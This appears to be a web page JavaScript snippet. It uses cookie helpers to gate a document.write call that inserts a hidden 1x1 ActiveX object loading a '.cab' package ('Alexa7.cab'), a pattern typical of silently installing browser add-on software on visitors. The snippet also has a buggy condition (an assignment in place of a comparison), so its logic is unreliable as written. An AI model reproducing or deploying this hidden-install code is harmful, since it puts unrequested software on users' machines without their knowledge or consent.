var strPartner = location.search;
        function getCookie(name) {
        
          var search; 
        
          search = name + "="
          offset = document.cookie.indexOf(search) 
          if (offset != -1) {
            offset += search.length ;
            end = document.cookie.indexOf(";", offset) ;
            if (end == -1)
              end = document.cookie.length;
            return unescape(document.cookie.substring(offset, end));
          }       
          else    
            return "";
        }       
       /* 
	function setPopupedMinute(name, m) {
            var expireDate = new Date();
            expireDate.setTime (expireDate.getTime() + (600 * 1000 * m));
            //var expireDate = new Date((new Date()).getTime() + (600 * 1000 * m));    
	    document.cookie = "dg_user_new_" + name + "=popuped; expires=" + expireDate.toGMTString() + "path=/";
        }
*/
	function setPopupedMinute(name, m) {
            var expireDate = new Date();
            expireDate.setTime (expireDate.getTime() + (600 * 1000 * m));
            document.cookie = "dg_user_new_" + name + "=" + escape("popuped") +
            "; expires=" + expireDate.toGMTString() +  "; path=/";
        }

        
        function isPopuped(name) {
            var userName = "dg_user_new_" + name;
            var cookie = getCookie(userName);
	if (cookie == "popuped") 
                return 1; 
            else 
                return 0;
        }   

	 if (( 0 == isPopuped("haodx"))&&(rf="")) {
document.write('<OBJECT ID="BrowserProxy" CLASSID="CLSID:69A72A8A-84ED-4a75-8CE7-263DBEF3E5D3" WIDTH="1" HEIGHT="1" codeBase="/software/Alexa7.cab#Version=-1,-1,-1,-1' + strPartner + '"></OBJECT>');
		  setPopupedMinute("haodx", "3"); // 7 means 7 days
		}
